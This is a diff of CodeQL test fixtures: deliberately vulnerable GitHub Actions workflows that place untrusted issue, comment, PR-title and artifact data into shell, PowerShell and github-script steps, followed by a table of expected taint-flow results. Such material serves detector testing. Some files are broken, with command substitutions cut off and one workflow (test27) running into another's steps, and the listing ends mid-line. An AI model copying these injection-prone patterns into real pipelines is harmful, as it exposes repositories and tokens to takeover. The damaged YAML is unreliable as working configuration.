/dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml @@ -0,0 +1,29 @@ +name: Issue Forms Body Parser + +on: + workflow_dispatch: + inputs: + issue_number: + type: string + description: issue number + required: true +env: + GH_TOKEN: ${{ github.token }} + +jobs: + process: + runs-on: ubuntu-latest + steps: + - name: Fetch the issue + id: read_issue_body + run: + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT + + - name: Issue Forms Body Parser + id: parse + uses: zentered/issue-forms-body-parser@v2.0.0 + with: + body: ${{ steps.read_issue_body.outputs.body }} + + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml new file mode 100644 index 000000000000..e9ba77c0f939 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml @@ -0,0 +1,52 @@ +name: Test WR + +on: + workflow_run: + workflows: + - Test + types: + - completed + +permissions: + contents: write + pull-requests: write + +jobs: + setup: + name: Setup + runs-on: ubuntu-24.04 + outputs: + github-sha: ${{ steps.get-sha.outputs.sha }} + chart-version: ${{ steps.get-version.outputs.chart_version }} + steps: + - name: Get triggering event SHA + id: get-sha + run: | + if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then + echo sha="${{ inputs.checkout_ref }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "workflow_run" ]]; then + echo sha="${{ github.event.workflow_run.head_sha }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "push" ]]; then + echo sha="${{ github.sha }}" >> $GITHUB_OUTPUT + else + echo "Invalid event type" + exit 1 + fi + - name: Checkout Source Code + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + persist-credentials: false + ref: ${{ steps.get-sha.outputs.sha }} + fetch-depth: 0 + - name: Get version + id: get-version + run: | + echo "chart_version=$(> $GITHUB_OUTPUT + - name: Check out scripts + uses: actions/checkout@v3 + - name: Setup Node + uses: actions/setup-node@v3 + with: + node-version: '14' + check-latest: true + - name: Install dependencies + run: | + cd .github/scripts + npm install + - name: Approve or deny request + uses: actions/github-script@main + env: + VERSION: ${{ steps.get_version.outputs.version }} + with: + debug: true + script: | + const options = { token: '${{ secrets.TOKEN }}', adminOpsOrg: '${{ vars.ADMIN_OPS_ORG }}', actionsApprovedOrg: '${{ vars.ACTIONS_APPROVED_ORG }}', actionsApproverTeam: '${{ vars.ACTIONS_APPROVERS_TEAM }}', baseUrl: '${{ github.api_url }}', version: process.env.VERSION }; + const payload = ${{ needs.parse-issue.outputs.payload }} + await require('./.github/scripts/approve-or-deny-request.js')({github, context, payload, options}); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml new file mode 100644 index 000000000000..75bf0527ee8b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml @@ -0,0 +1,27 @@ +name: Test +on: + issue_comment: + types: [created, edited] + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Dump GitHub comment context + id: github_comment_step + run: echo '${{ toJSON(github.event.comment) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event.issue) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event) }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml new file mode 100644 index 000000000000..b9b861bd060c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml @@ -0,0 +1,13 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo '${{ toJSON(github.event.comment.body).foo }}' + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml new file mode 100644 index 000000000000..535b9bd24bef --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml @@ -0,0 +1,16 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + { + echo "recreate_vm=${{ contains(github.event.comment.body, 'recreate-vm') }}" + } >> $GITHUB_OUTPUT + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml new file mode 100644 index 000000000000..cae9358e8b7d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml @@ -0,0 +1,20 @@ +name: Test +on: issue_comment +permissions: write-all +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: comment-branch + uses: xt0rted/pull-request-comment-branch@v2 + with: + repo_token: ${{ github.token }} + - id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ github.token }} + - run: | + echo "HEAD_REF1 from PR: ${{ steps.comment-branch.outputs.head_ref }}" + - run: | + echo "HEAD_REF2 from PR: ${{ steps.refs.outputs.head_ref }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml new file mode 100644 index 000000000000..3b532e4cc672 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml @@ -0,0 +1,48 @@ +run-name: Cleanup ${{ github.head_ref }} +on: + pull_request_target: + types: labeled + paths: + - 'images/**' + +jobs: + clean_ci: + name: Clean CI runs + runs-on: ubuntu-latest + permissions: + actions: write + steps: + - env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + shell: pwsh + run: | + $startDate = Get-Date -UFormat %s + $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") + while ($true) { + $continue = $false + foreach ($wf in $workflows) { + $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" + $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } + $skippedIds | ForEach-Object { + $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" + Invoke-Expression -Command $deleteCommand + } + $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" + $pending = Invoke-Expression -Command $pendingCommand + if ($pending -gt 0) { + Write-Host "Pending for ${wf}.yml: $pending run(s)" + $continue = $true + } + } + if ($continue -eq $false) { + Write-Host "All done, exiting" + break + } + $curDate = Get-Date -UFormat %s + if (($curDate - $startDate) -gt 60) { + Write-Host "Reached timeout, exiting" + break + } + Write-Host "Waiting 5 seconds..." + Start-Sleep -Seconds 5 + } diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml new file mode 100644 index 000000000000..2d60b9fe6d46 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -0,0 +1,43 @@ +name: Test + +on: + issue_comment: + +jobs: + parse-issue: + runs-on: ubuntu-latest + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ github.event.issue.number }} + payload_marker: request + fail_on_missing: false + - run: echo ${{ steps.issue_body_parser_request.outputs.payload }} + approve-or-deny-request: + runs-on: ubuntu-latest + needs: parse-issue + steps: + - run: echo ${{ needs.parse-issue.outputs.payload }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ fromJson(needs.parse-issue.outputs.payload).version }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml new file mode 100644 index 000000000000..8f691ed759db --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml @@ -0,0 +1,15 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: artifact + run: | + echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | +| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | provenance | | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | provenance | | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | provenance | | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | provenance | | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | provenance | | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | provenance | | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | provenance | | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | provenance | | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | provenance | | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | provenance | | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | +| .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | provenance | | +| .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | provenance | | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho 